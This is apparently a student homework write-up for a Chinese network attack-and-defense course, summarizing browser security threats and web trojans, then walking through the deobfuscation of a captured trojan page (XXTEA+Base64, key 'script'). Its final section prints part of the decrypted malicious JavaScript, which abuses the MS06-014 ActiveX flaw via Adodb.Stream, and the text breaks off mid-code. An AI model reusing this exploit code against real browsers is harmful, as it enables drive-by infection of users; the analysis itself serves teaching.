20199320 2019-2020-2 《网络攻防实践》第12周作业

20199320 2019-2020-2 《网络攻防实践》第12周作业

这个作业属于哪个课程	https://edu.cnblogs.com/campus/besti/19attackdefense
这个作业的要求在哪里	https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10756
我在这个课程的目标是	掌握网络攻防知识及操作
这个作业在哪个具体方面帮助我实现目标	掌握客户端的Web浏览器上存在的安全威胁和攻击技术，包括网页木马、网络钓鱼。

一、知识点总结

1.1 现代Web浏览器基本结构与机理

• 现代浏览器的基本结构

  如图：
  

  现代Web浏览器软件除了在内核引擎中实现符合各种标准的基本功能和特性之外，还采用各种扩展机制允许第三方开发一些插件，通过各种客户端脚本执行环境、独立沙箱运行环境和虚拟机，来丰富计算机功能。

1.2 Web浏览的安全问题与威胁

• Web浏览器软件的安全困境三要素

  • 复杂性：现代浏览器软件的复杂性意味着更多的错误和安全缺陷，也就导致了目前浏览器软件中存在着可被渗透攻击所利用的大量安全漏洞。
  • 可扩展性：第三方扩展插件的开发过程更缺乏安全保证；插件一般不具备自动更新的机制。
  • 连通性：浏览器始终工作在联网状态，一旦存在安全漏洞，很容易被利用。

• Web浏览安全威胁位置

  Web浏览环境及其安全威胁的层次模型：
  

1.3 Web浏览器的渗透攻击威胁——网页木马

• 网页木马发展的驱动力——黑客地下经济链

  黑客地下经济链结构：
  

  • 病毒编写者：有一定编程能力，能获取漏洞和相应攻击代码，出售自己开发的破解工具或木马程序并获利。
  • 黑站长/网络骇客：攻击知名但有漏洞的网站，出售其访问流量。
  • “信封”盗窃者：“信封”指盗窃的帐号和密码，“信封”盗窃者只需购买病毒编写者的木马程序和黑站长/网络骇客的访问流量，构建网页木马程序，从而获取“信封”。
  • 虚拟资产盗窃者：可以没有任何技术知识，但对地下经济链有深入了解，通过购买“信封”，登录网游或QQ盗取虚拟资产，并贩卖。
  • 虚拟资产卖家：购买虚拟资产，向玩家出售从中获利。构成了产业链的流通。
  • 玩家：购买虚拟资产打游戏，构成了地下经济链的基础。

• 网页木马存在的技术基础——Web浏览端安全漏洞

  • 网页木马所攻击的安全漏洞的存在位置非常多样化，包括Web浏览器自身、浏览器插件、关联某些Web文件的应用程序等。
  • 除了微软操作系统平台软件本身的安全漏洞之外，网页木马近年来也在不断地发掘和利用其他流行应用软件中的安全漏洞。
  • 一些影响范围广的安全漏洞，如MS06-014， 会被网页木马持续地利用，以攻击那些长时间不进行系统升级与补丁更新，或者安装老旧操作系统版本的互联网用户计算机。

• 网页木马的机理分析

  网页木马的定义特性

  网页木马是对Web浏览端软件进行客户端渗透攻击的一类恶意移动代码，通常以网页脚本语言如JavaScript、VBScirpt 实现，或以Flash、PDF等恶意构造的Web文件形式存在，通过利用Web浏览端软件中存在的安全漏洞，获得客户端计算机的控制权限以植入恶意程序。

  网页木马的机理

  • 网页木马的攻击是被动的（需要诱使用户访问网页木马页面）、多步骤的。

  • 网页木马的攻击技术流程如图：
    

  • 网页木马特性

    • 多样化的客户端渗透攻击位置和技术类型：为提升渗透攻击成功率（中马率），攻击者会集成多样化的客户端渗透攻击代码。
    • 分布式、复杂的微观链接结构：为扩大攻击范围，攻击者会采用多个网页木马宿主站点，引入中间跳转站点提升防御方的分析代价。
    • 灵活多变的混淆与对抗分析能力：为躲避反病毒检测，攻击者利用Web客户端脚本语言的灵活机制对网页木马进行混淆处理。

• 网页木马的本质核心——浏览器渗透攻击

  • VBScript编写的MS06-014网马

    通过VBScript所提供的创建ActiveX对象、调用ActiveX提供方法随即完成了攻击目的，这也是不安全方法类安全漏洞利用的常见模式。

  • JavaScript语言实现的ANI光标漏洞网马

    利用堆内存操纵（Heapspray）技术，首先通过构造字符串数组的方式在堆内存空间中“堆砌”出包含大段空字节着陆区(Sledge,即代码中的spraySlide字符串)和Shellcode (即代码中的payloadCode 字符串)的恶意代码指令空间来，然后利用内存安全违规类漏洞将指向“堆砌”堆内存空间的地址装载入EIP指令寄存器中，使得攻击目标软件转而去执行堆中的Shellcode, ANI 光标漏洞网马中即通过特殊构造的ANI光标图片文件，利用系统在渲染畸形的光标文件时没有正确验证文件头部中所指定的文件大小，从而导致数据缓冲区溢出导致执行“0x04040404"位置的堆内存中恶意指令。

• 网页挂马机制

  网页挂马含义：为使用户访问网页木马，攻击者将网页木马挂接到有访问流量的网站页面上的过程称为网页挂马。

  网页挂马机制策略

  • 内嵌HTML标签

    在实际中最常用于网页挂马的内嵌标签为iframe，如

  • 恶意Script脚本

    利用script 脚本标签通过外部引用脚本的方式来包含网页木马，例如，

    可以看到 new09.htm 文件中，用 iframe 引用了一个 http://aa.18dd.net/aa/kl.htm 文件，又用 javascript 引用了一个 http://js.users.51.la/1299644.js 文件。

  • 我们对它们分别作32位的 MD5 散列，如下：

    MD5(http://aa.18dd.net/aa/kl.htm) = 7f60672dcd6b5e90b6772545ee219bd3
    MD5(http://js.users.51.la/1299644.js) = 23180a42a2ff1192150231b44ffdf3d3
    

    下载这两个文件：

    http://192.168.68.253/scom/hashed/7f60672dcd6b5e90b6772545ee219bd3
    http://192.168.68.253/scom/hashed/23180a42a2ff1192150231b44ffdf3d3
    

  • 打开后者，内容如下：

    // 本文件内容是流量统计代码,不是木马
    

    这显然不是我们所想要的内容。

  • 打开第一个文件，它的内容看起来很复杂，但实际上这是一种被称为 XXTEA+Base64 的加密方法，对付这种加密方法，我们只要找到它的加密密钥就可以。在文件中找到下面的语句：

    t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));
    

    xxtea_decrypt 函数的第二个参数就是密钥。加密者果然老奸巨滑，连密钥也被处理过，不过只是简单地使用了 16 进制加密。转换一下，密钥是“script”。

  • 访问 http://www.cha88.cn/safe/xxtea.php，在密钥一栏中填入“script”，在下面大的文本框中粘贴那个文件的全部内容，点“解密”，文本框的内容变为全是十六进制，即加密者又用了另一种加密方法，也就是十六进制加密，对引号内的内容解密，得：

    function init(){document.write();}
    window.onload = init;
    if(document.cookie.indexOf('OK')==-1){
    try{var e;
    var ado=(document.createElement("object"));
    ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    var as=ado.createobject("Adodb.Stream","")}
    catch(e){};
    finally{
    var expires=new Date();
    expires.setTime(expires.getTime()+24*60*60*1000);
    document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
    if(e!="[object Error]"){
    document.write("